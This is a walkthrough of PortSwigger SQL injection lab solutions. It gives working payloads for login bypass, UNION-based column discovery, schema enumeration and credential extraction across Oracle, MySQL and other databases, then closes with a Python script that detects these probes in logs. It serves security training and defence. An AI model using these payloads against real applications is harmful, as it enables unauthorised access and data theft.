Port Swigger SQL injection Lab Solutions

- Retrieving hidden data

1.Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data

  1. Solutions
    1. '+OR+1=1-- -> Required

    The server also responds to the following:

    1. 'OR+'1'='1--
    2. 'OR+'1'='1'--
    3. 'OR+'1'--
    4. 'OR+true--
    5. 'OR+'a'='a'--
    6. /OR+1=1--
    7. )'OR+1=1--
    8. ""OR+1=1--
    9. )*OR+1=1--

- Subverting application logic

2.Lab: SQL injection vulnerability allowing login bypass

  1. Solutions

    1. username : administrator'-- password : ''
    2. username : a'OR+1=1-- password : ''

- Retrieving data from other database tables

3.Lab: SQL injection UNION attack, determining the number of columns returned by the query

  1. Solutions

The first step of such an attack is to determine the number of columns that are being returned by the query. The server responds to 'ORDER+BY+1--, 'ORDER+BY+2-- and 'ORDER+BY+3--, which means the query returns 3 columns.

  1. '+UNION+SELECT+NULL,NULL,NULL--
  2. 'UNION+SELECT+NULL,NULL,NULL--
  3. 'union+select+null,null,null--

4.Lab: SQL injection UNION attack, finding a column containing text

  1. Solutions

The server responded to '+UNION+SELECT+NULL,'xyz',NULL--, which means the second column contains text. Make the database retrieve the string 'IyLLPT' (shown at the top of the screen; it can be different in your case).

  1. '+UNION+SELECT+NULL,'IyLLPT',NULL--

5.Lab: SQL injection UNION attack, retrieving data from other tables

  1. Solutions

By applying '+UNION+SELECT+NULL,NULL-- we can say the query returns two columns. By applying '+UNION+SELECT+'abc','xyz'-- we can say both columns hold string values. To retrieve the contents of the users table we can use the payload '+UNION+SELECT+username,+password+FROM+users--, where username is the name of the first column, password is the name of the second column and users is the name of the table in the database.

Example

Database name : USERS

| username | password |
| --- | --- |
| administrator | bp6w7q9023goawolzuyh |
| Content in the first column | Content in the second column |

Now, to solve the challenge, go to the raw Response in Burp Suite and search for administrator and its password bp6w7q9023goawolzuyh.

6.Lab: SQL injection UNION attack, retrieving multiple values in a single column

  1. Solutions

By applying '+UNION+SELECT+NULL,NULL-- we can say the query returns two columns. By applying '+UNION+SELECT+NULL,'abc'-- we can say the second column holds string values. Now, to retrieve the data through only one column, we can use the payload '+UNION+SELECT+NULL,username||'~'||password+FROM+users--

||'~'|| joins username and password, like administrator~wet39rb7kc6kt99lq0o6

Now, to solve the challenge, go to the Response in Burp Suite and get the username~password pair administrator~wet39rb7kc6kt99lq0o6

- Examining the database in SQL injection attacks

7.Lab: SQL injection attack, querying the database type and version on Oracle

  1. Solutions

On Oracle databases, every SELECT statement must specify a table to select FROM. If your UNION SELECT attack does not query from a table, you will still need to include the FROM keyword followed by a valid table name.

There is a built-in table on Oracle called DUAL which you can use for this purpose. For example: UNION SELECT 'abc' FROM DUAL

By applying '+UNION+SELECT+NULL,NULL+FROM+DUAL-- we can say the query returns two columns. By applying '+UNION+SELECT+'abc','xyz'+FROM+DUAL-- we can say the first and second columns hold string values. To retrieve the version of the database, for Oracle we can use the cheat sheet:

  • SELECT banner FROM v$version
  • SELECT version FROM v$instance

The payload will look like:

'+UNION+SELECT+banner,NULL+FROM+v$version--

'+UNION+SELECT+version,NULL+FROM+v$instance--

8.Lab: SQL injection attack, querying the database type and version on MySQL and Microsoft

  1. Solutions

By applying '+UNION+SELECT+NULL,NULL+FROM+DUAL# we can say the query returns two columns. By applying '+UNION+SELECT+'abc','xyz'+FROM+DUAL# we can say the first and second columns hold string values. Now, to retrieve the version of the database, for Microsoft DB we can use the cheat sheet:

  • Microsoft: SELECT @@version

The payload will look like:

'+UNION+SELECT+@@version,NULL+FROM+DUAL#

'+UNION+SELECT+NULL,@@version+FROM+DUAL#

9.Lab: SQL injection attack, listing the database contents on non-Oracle databases

  1. Solutions

As we can see, the database responds to '+UNION+SELECT+NULL,NULL--, which means there are two columns.

By using the payload '+UNION+SELECT+'abc','xyz'-- we can see that both columns hold string values.

Use the payload '+UNION+SELECT+table_name,+NULL+FROM+information_schema.columns-- to get the table name users_xxxx.

Use the payload '+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='USERS_ABCDEF'-- to retrieve the details of the columns in the table (replacing the table name; in my case it is users_ggighe). You can find it by searching for users in the bottom-right search field in Burp Suite.

By using '+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_ggighe'-- you can see the username_xxxx and password_xxxx columns.

Now replace the column names with username_xxxx and password_xxxx by using '+UNION+SELECT+username_xxxx,+password_xxxx+FROM+users_xxxx--, then search for administrator and get the password.

Finally, log in using administrator and its password.

10.Lab: SQL injection attack, listing the database contents on Oracle

  1. Solutions

Note that in Oracle every SELECT statement must specify a table to select FROM.

There is a built-in table on Oracle called DUAL which you can use for this purpose. For example: UNION SELECT 'abc' FROM DUAL.

By using '+UNION+SELECT+'abc','xyz'+FROM+DUAL-- we can say the query returns two columns and both hold string values.

Using '+UNION+SELECT+table_name,NULL+FROM+all_tables-- will get the name of the table.

Then use '+UNION+SELECT+column_name,NULL+FROM+all_tab_columns+WHERE+table_name='USERS_TJQMGZ'-- to retrieve the names of the username and password columns.

After you get the username and password column names, use the payload '+UNION+SELECT+USERNAME_TZBHEF,PASSWORD_YAKDEJ+FROM+USERS_TJQMGZ-- to get the username and password of the administrator.

Finally, log in using administrator and its password.
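The probing sequence used across Labs 3 to 10 (ORDER BY n, UNION SELECT NULL, schema and version queries) leaves a recognisable trail in request logs. The following detection sketch is an added example, not part of the original write-up; the log format, rule names, client addresses and /filter path are assumptions, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Patterns for the probing steps this page walks through.
RULES = [
    ("column-count probe (ORDER BY n)", re.compile(r"'\s*order\s+by\s+\d+", re.I)),
    ("UNION SELECT injection", re.compile(r"'\s*union\s+select\b", re.I)),
    ("schema enumeration", re.compile(
        r"information_schema\.|\ball_tables\b|\ball_tab_columns\b", re.I)),
    ("version fingerprinting", re.compile(r"v\$version|v\$instance|@@version", re.I)),
    ("tautology / comment truncation", re.compile(r"'\s*or\s+.+(--|#)", re.I)),
]

def scan_request(url):
    """Return the rule names matched by any decoded query parameter."""
    hits = []
    # parse_qsl percent-decodes and turns '+' into spaces, as the server would.
    for _, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        for name, rx in RULES:
            if rx.search(value) and name not in hits:
                hits.append(name)
    return hits

def scan_log(lines):
    """Return (client, path, hits) for log lines with suspicious parameters."""
    out = []
    for line in lines:
        client, _method, url = line.split(" ", 2)
        hits = scan_request(url)
        if hits:
            out.append((client, urlsplit(url).path, hits))
    return out

# Constructed sample log lines in the assumed format "<client> <method> <url>".
SAMPLE_LOG = [
    "203.0.113.7 GET /filter?category=Gifts",
    "203.0.113.7 GET /filter?category='ORDER+BY+3--",
    "203.0.113.7 GET /filter?category='+UNION+SELECT+NULL,NULL,NULL--",
    "203.0.113.7 GET /filter?category='+UNION+SELECT+table_name,+NULL+FROM+information_schema.columns--",
    "198.51.100.4 GET /filter?category=Food+%26+Drink",
]

if __name__ == "__main__":
    for client, path, hits in scan_log(SAMPLE_LOG):
        print(client, path, hits)
```

Signature matching like this is a triage aid for logs and WAF tuning; alternate encodings and whitespace tricks can slip past it, so the fix remains parameterized queries in the application.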